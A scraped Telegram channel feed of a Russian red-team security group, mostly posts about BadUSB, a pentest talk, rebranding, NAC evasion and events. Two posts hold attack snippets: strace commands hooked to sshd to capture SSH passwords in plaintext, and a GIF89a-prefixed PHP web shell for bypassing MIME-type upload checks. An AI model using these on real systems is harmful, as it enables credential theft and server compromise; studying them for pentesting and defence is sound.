RESOLUTE ATTACK – Telegram
RESOLUTE ATTACK
6.35K subscribers
207 photos
39 videos
84 files
297 links
⚡️RESOLUTE ATTACK - Компания по информационной безопасности

YouTube - https://www.youtube.com/@RESOLUTE-ATTACK

Chat - @RESOLUTECHAT

Web Site - www.resolute-attack.com

Обратная связь - @ResoluteAttack_Bot
Download Telegram
17🔥9🤣6👍32
🦆Rubber Ducky/BadUSB

Недавно в мои руки, наконец, попала такая игрушка как Flipper Zero. Копаясь в функционале, обнаружил там утилиту BadUSB. Сам по себе BadUSB - это вектор атак, суть которого заключается в эмуляции системой работы клавиатуры или выполнения любых операций на ПК жертвы под видом обычного юзера

Читать

#Инструменты #Обход
Please open Telegram to view this post
VIEW IN TELEGRAM
👍167🔥31
⚡️ Внутрянка с точки зрения пентестера
Уже через час🔥

В докладе мы разберём тему:
"Внутрянка с точки зрения пентестера".

Разберем такие моменты как: пассивный анализ трафика, активная разведка, основные атаки на ActiveDirectory, извлечение информации из LDAP, пивотинг

➡️ Спикер: Кирилл Филимонов ( @Curiv )
Канал спикера - https://news.1rj.ru/str/pathsecure

Кирилл является специалистом в сфере этичного хакинга. Он уже успел выступить со своими докладами на:
Конференциях OffZone2022, HackConf, PermSecurityMeetup, КодИБ, а также в сообществах Хакердом и DC7342

➡️ https://www.youtube.com/watch?v=BJ-D-f8KU7U

#Тестирование #Внутрянка
Please open Telegram to view this post
VIEW IN TELEGRAM
94🔥4
Последний доклад под эгидой Е7 ;(
😱279
Channel name was changed to «RESOLUTE ATTACK»
Итак, давай мы проясним вам, что происходит.
Мы решили сделать ребрендинг, потому что мы выбрали вектор, по которому будем двигаться - RED TEAM. И хотим быть максимально близки, даже по названию.

💻 RESOLUTE ATTACK - Переводится как решительное нападение. Все права на Е7 остаются по-прежнему у нас, как на логотип, так и на название. Если увидите ещё проекты с нашим прошлым логотипом, знайте - они негодяи.

🌹Что означает чёрная роза в руках?
У чёрной розы множество значений, в нашем же случае значение могущества, отваги и борьбы со страхом.

⚡️ Что будет с дальнейшем контентом? - Будет только лучше, мы растём изо дня в день. Step by step, brother.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍53🔥179🤣32😈2
Призрачный Ethernet & Обход NAC – Практический обзор

Какой бы ни была причина, сокрытие вашей личности в сети на уровне Ethernet дает значительные преимущества при внутренней оценке безопасности.
Одним из практических способов добиться этого является использование метода, который мы любим называть «Ethernet Ghosting», когда законное устройство в сети используется в качестве маски для маскировки связи с устройством злоумышленника.

Читать

#Обход
Please open Telegram to view this post
VIEW IN TELEGRAM
158👍7🔥7
💻 CTF TIME - Платформа на который публикуются ближайшие CTF ивенты, в которых можно принять участие. Также есть система рейтинга, на которой можно посмотреть лидеров по CTF соревнованиям в мире. Также есть история соревнований. Кибер спорт должен быть таким?

Теперь ветка в нашем чате кибер ивенты будет активно заполняться.

#CTF
Please open Telegram to view this post
VIEW IN TELEGRAM
15🔥83👍3
⚡️RESOLUTE ATTACK и Anti-Malware.ru теперь официально имеют партнёрские отношения🔥
Предлагаем вам посетить ближайший их ивент

AM Live: Аппаратное обеспечение для российского ИБ
📅14 декабря, СР, 11:00

В прямом эфире обсудим:
🔸Сможет ли рынок информационной безопасности адаптироваться к новой реальности?
🔸Получится ли избежать тотального дефицита оборудования?
🔸 Россия не производит современные микропроцессоры, чипы памяти, СХД и много чего еще. Есть ли шансы это исправить?
🔸Спрос и предложение на аппаратное обеспечение для ИБ

Модератор:
🔸Руслан Иванов, Директор офиса развития инфраструктуры стратегических корпоративных заказчиков «Ростелеком-Солар»

Спикеры:
🔸Павел Коростелев, Руководитель отдела продвижения продуктов «Код Безопасности»
🔸Карина Абагян, Директор по стратегическому развитию
АО "Микрон"
🔸Сергей Плотко, Директор по аналитике и интеграции АО "НПП "Цифровые решения"
🔸Константин Закатов, Руководитель Департамента информационной безопасности ООО «ПК АКВАРИУС»

Принять участие

#Разное
Please open Telegram to view this post
VIEW IN TELEGRAM
9🔥8👍2
This media is not supported in your browser
VIEW IN TELEGRAM
🤨Команда девелоперов
RESOLUTE ATTACK

Строчит курс PRTT 😂
Please open Telegram to view this post
VIEW IN TELEGRAM
🤣356👍4
Forwarded from SecuriXy.kz
Новость бударажущая ум и представление о безопасности Linux*
Так сказать мир был до этой новости и теперь…
Получаем пароль от SSH в открытом виде
*
1. получаем точный идентификатор sshd

pgrep -l sshd

2. Отслеживаем системные вызовы

strace -f -p <ssh_PID> -e trace=write -o capture

Ну или одной строкой

strace -f -p $(service sshd status |grep PID|awk "{print \$3}") -e trace=write -o capture


#ssh #sniff #password
18🔥94👍4
😈Scraping директорий на Python

Всем привет! С вами wr3dmast3r, и сегодня мы напишем простой скрапер директорий сайта. Приступим.

Читать

#Python
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥176👍5
До 9к добъём?
👍34🔥12
🗣Обход загрузки файлов с использованием MIME-типа

Можно обмануть проверку безопасности mime-типа, чтобы думать, что загруженный файл является изображением, но на самом деле веб-сервер распознает его как файл скрипта PHP.

Для этого нам нужно добавить только одну строку в начале нашего скрипта: GIF89a;

GIF89a - это заголовок файла GIF. Когда файл просматривается, mime_content_type("myfile");он вводится в заблуждение, чтобы думать, что это изображение, а не оболочка PHP.

GIF89a;
<?php
system('whoami'); # shellcode goes here
?>

RESOLUTE ATTACK

#Обход
Please open Telegram to view this post
VIEW IN TELEGRAM
17👍11🔥6😍3🤣3